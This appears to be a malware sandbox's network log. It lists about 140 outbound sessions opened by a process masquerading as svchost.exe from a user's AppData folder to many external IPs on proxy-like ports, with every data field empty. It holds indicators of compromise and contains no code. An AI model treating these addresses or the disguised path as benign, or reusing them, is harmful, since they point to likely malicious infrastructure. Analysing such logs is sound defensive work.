Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4937	192.168.2.5	49174	129.213.150.205	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4938	192.168.2.5	65530	121.164.200.18	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4939	192.168.2.5	65533	51.15.247.93	16379	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4940	192.168.2.5	65528	45.11.95.165	5219	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4941	192.168.2.5	65525	202.162.219.10	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4942	192.168.2.5	49161	188.166.17.18	8881	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4943	192.168.2.5	49162	128.140.26.12	80	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4944	192.168.2.5	63776	111.20.217.178	9091	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4945	192.168.2.5	49156	212.127.93.185	8081	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4946	192.168.2.5	49175	93.190.142.57	31280	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4947	192.168.2.5	49170	34.95.243.122	8081	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4948	192.168.2.5	64001	148.72.215.79	47202	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4949	192.168.2.5	49171	43.131.248.165	15673	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4950	192.168.2.5	64869	162.241.137.197	40604	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4951	192.168.2.5	64826	45.249.48.201	4153	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4952	192.168.2.5	49192	119.28.4.112	9999	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4953	192.168.2.5	49168	203.171.19.98	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4954	192.168.2.5	49246	192.154.244.92	9000	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4955	192.168.2.5	49247	34.49.208.221	80	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4956	192.168.2.5	49210	5.161.219.13	4228	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4957	192.168.2.5	49214	94.131.64.94	58378	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4958	192.168.2.5	49167	103.146.137.5	1081	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4959	192.168.2.5	49234	45.61.188.134	44499	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4960	192.168.2.5	64023	49.249.155.3	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4961	192.168.2.5	64913	184.105.182.254	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4962	192.168.2.5	49202	94.177.106.178	2324	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4963	192.168.2.5	49203	94.30.152.172	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4964	192.168.2.5	62844	34.81.72.31	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4965	192.168.2.5	64977	162.241.6.97	31794	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4966	192.168.2.5	49204	120.79.101.0	8888	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4967	192.168.2.5	64905	189.240.60.163	9090	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4968	192.168.2.5	64808	185.49.31.207	8081	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4969	192.168.2.5	64087	34.87.84.105	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4970	192.168.2.5	49215	43.128.146.42	15673	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4971	192.168.2.5	49241	43.155.130.182	15673	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4972	192.168.2.5	49219	213.252.245.221	6116	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4973	192.168.2.5	49205	138.36.150.16	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4974	192.168.2.5	49206	115.239.234.43	7302	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4975	192.168.2.5	49209	60.190.68.154	7302	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4976	192.168.2.5	65509	8.209.255.13	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4977	192.168.2.5	49208	64.43.89.102	6361	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4978	192.168.2.5	49184	13.234.24.116	3128	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4979	192.168.2.5	64930	162.214.227.68	60433	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4980	192.168.2.5	65453	120.194.4.157	5443	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4981	192.168.2.5	49252	52.16.232.164	3128	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4982	192.168.2.5	49258	46.17.63.166	9480	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4983	192.168.2.5	64937	189.240.60.171	9090	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4984	192.168.2.5	49214	94.131.64.94	58378	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4985	192.168.2.5	49256	18.135.211.182	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4986	192.168.2.5	64231	162.241.158.204	52980	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4987	192.168.2.5	49267	18.169.83.87	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4988	192.168.2.5	64993	115.96.208.124	8080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4989	192.168.2.5	49196	117.160.250.131	8899	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4990	192.168.2.5	49266	27.96.235.171	80	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4991	192.168.2.5	65318	142.54.228.193	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4992	192.168.2.5	49271	18.135.133.116	80	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4993	192.168.2.5	49279	129.213.150.205	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4994	192.168.2.5	65077	174.138.114.226	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4995	192.168.2.5	64525	125.227.225.157	3389	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4996	192.168.2.5	64271	103.35.190.18	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4997	192.168.2.5	49273	23.137.248.197	8888	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4998	192.168.2.5	49272	185.158.114.14	25697	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4999	192.168.2.5	49276	120.78.191.68	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5000	192.168.2.5	49278	14.103.24.20	8000	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5001	192.168.2.5	64874	110.93.227.28	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5002	192.168.2.5	49294	43.153.22.29	10005	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5003	192.168.2.5	64289	5.252.23.220	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5004	192.168.2.5	62915	52.80.19.207	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5005	192.168.2.5	49298	104.16.221.57	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5006	192.168.2.5	64324	177.131.29.213	4153	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5007	192.168.2.5	49304	172.67.25.204	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5008	192.168.2.5	65050	190.111.209.207	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5009	192.168.2.5	49350	43.153.175.43	443	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5010	192.168.2.5	49359	43.153.175.43	443	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5011	192.168.2.5	49365	43.153.175.43	443	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5012	192.168.2.5	49366	43.153.175.43	443	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5013	192.168.2.5	49166	185.139.56.133	4145	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5014	192.168.2.5	65057	36.68.137.57	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5015	192.168.2.5	49309	34.49.208.221	80	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5016	192.168.2.5	49286	51.15.247.93	16379	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5017	192.168.2.5	64373	52.151.210.204	9002	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5018	192.168.2.5	49287	121.164.200.18	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5019	192.168.2.5	49285	45.138.87.238	1080	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5020	192.168.2.5	49293	95.164.89.123	8888	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5021	192.168.2.5	65314	107.175.37.178	43029	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5022	192.168.2.5	64284	202.70.80.153	5678	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5023	192.168.2.5	49302	188.166.17.18	8881	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5024	192.168.2.5	65285	189.240.60.166	9090	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5025	192.168.2.5	65237	198.89.91.42	5678	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5026	192.168.2.5	63081	209.121.164.50	31147	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5027	192.168.2.5	65383	45.195.149.79	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5028	192.168.2.5	49353	104.21.194.19	80	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5029	192.168.2.5	62966	212.47.245.57	16379	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5030	192.168.2.5	65297	217.182.129.103	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5031	192.168.2.5	49314	119.28.4.112	9999	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5032	192.168.2.5	65265	54.222.197.147	8080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5033	192.168.2.5	64457	192.252.216.81	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5034	192.168.2.5	49303	202.162.219.10	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5035	192.168.2.5	65457	104.236.0.129	22167	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5036	192.168.2.5	65451	92.204.134.38	7785	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5037	192.168.2.5	49374	142.54.228.193	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5038	192.168.2.5	49322	89.42.166.163	8080	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5039	192.168.2.5	63092	91.121.106.55	4444	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5040	192.168.2.5	49315	203.171.19.98	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5041	192.168.2.5	65433	173.249.7.118	2276	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5042	192.168.2.5	49300	5.44.42.115	58386	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5043	192.168.2.5	65414	51.75.126.150	21803	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5044	192.168.2.5	63182	147.124.212.31	24230	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5045	192.168.2.5	63050	115.74.157.191	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5046	192.168.2.5	49354	185.49.31.207	8081	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5047	192.168.2.5	65398	218.57.210.186	9002	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5048	192.168.2.5	63216	172.93.111.235	43209	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5049	192.168.2.5	49375	43.128.146.42	15673	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5050	192.168.2.5	65159	47.91.65.23	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5051	192.168.2.5	49331	103.86.109.38	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5052	192.168.2.5	49378	18.135.211.182	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5053	192.168.2.5	49380	18.169.83.87	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5054	192.168.2.5	65513	195.164.138.34	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5055	192.168.2.5	49383	23.137.248.197	8888	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5056	192.168.2.5	49384	125.227.225.157	3389	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5057	192.168.2.5	49402	104.18.251.208	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5058	192.168.2.5	65394	102.134.181.142	9999	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5059	192.168.2.5	64609	45.5.118.43	999	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5060	192.168.2.5	49394	98.162.25.23	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5061	192.168.2.5	49386	14.103.24.20	8000	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5062	192.168.2.5	49382	43.153.22.29	10005	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5063	192.168.2.5	49360	111.90.150.109	1080	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5064	192.168.2.5	49236	162.214.121.173	35183	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5065	192.168.2.5	49339	134.209.105.209	3128	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5066	192.168.2.5	49336	65.1.40.47	1080	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5067	192.168.2.5	49377	27.96.235.171	80	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5068	192.168.2.5	65484	51.158.124.167	16379	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5069	192.168.2.5	49381	18.135.133.116	80	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5070	192.168.2.5	49177	51.15.223.12	16379	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5071	192.168.2.5	49396	51.15.247.93	16379	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5072	192.168.2.5	49389	208.109.13.93	53778	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5073	192.168.2.5	49388	34.49.208.221	80	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5074	192.168.2.5	49399	121.164.200.18	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5075	192.168.2.5	49385	185.158.114.14	25697	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5076	192.168.2.5	49414	192.252.216.81	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5077	192.168.2.5	64629	159.223.71.71	51213	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
